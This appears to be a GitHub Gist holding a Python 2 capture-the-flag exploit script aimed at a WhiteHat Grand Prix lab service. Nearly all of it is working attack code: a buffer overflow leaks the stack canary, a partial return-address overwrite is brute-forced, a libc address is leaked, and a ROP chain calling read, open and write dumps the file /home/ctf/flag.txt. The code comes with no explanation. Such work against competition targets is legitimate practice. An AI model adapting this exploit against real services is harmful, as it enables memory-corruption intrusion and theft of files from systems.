Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
import time
def exploit():
# raw_input('Debug>')
while 1:
path_file = '/home/ctf/flag.txt'
p = Pwn(mode=1,host='lab10.grandprix.whitehatvn.com',port=1337)
# p = Pwn(mode=1)
p.connect()
# raw_input('Debug>')
p.read_until('Welcome to the lie dectection system!')
p.read_until('Your name:')
p.write('A'*265)
data = p.read_until('Your age:')
data = data[22:]
# print repr(data)
canary = '\x00' + data[265:265 + 7]
print 'Canary',hex(p.unpack(canary))
p.send('A'*264 + canary + 'A'*8 + '\x22\x4d') #brute force this
d = p.recv(1024)
d = p.recv(1024)
if 'Welcome to the lie dectection system!' in d:
if 'Your name:' not in d:
p.read_until('Your name:')
p.send('C'*336)
data = p.read_until('Your age:')
# print repr(data)
libc_base = p.unpack(data[358:358 + 6] + '\x00'*2) - 0x21ec5
open_addr = libc_base + 0xeb610
write_addr = libc_base + 0xeb860
read_addr = libc_base + 0xeb800
main_area = libc_base + 3925968
pop_rdx_pop_rsi = libc_base + 0x108169
pop_rdi = libc_base + 0x22b1a
print 'Libc_base',hex(libc_base)
print 'open()',hex(open_addr)
print 'read_addr()',hex(read_addr)
print 'write()',hex(write_addr)
pl = 'A'*264 + canary + 'A'*8
pl+= p.pA([
pop_rdi,
0,
pop_rdx_pop_rsi,
len(path_file),
main_area,
read_addr, # read(0,main_arae,len(path_file))
pop_rdi,
main_area,
pop_rdx_pop_rsi,
0x400,
0,
open_addr, # open(main_area,0)
pop_rdi,
3,
pop_rdx_pop_rsi,
4096,
main_area + 0x200,
read_addr, #read(3,main_area + 0x200,4096)
pop_rdi,
0,
pop_rdx_pop_rsi,
4096,
main_area + 0x200,
write_addr # write(0,main_area + 0x200,4096)
])
p.send(pl)
time.sleep(1)
p.send(path_file)
p.io()
break
else:
print 'Thot'
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment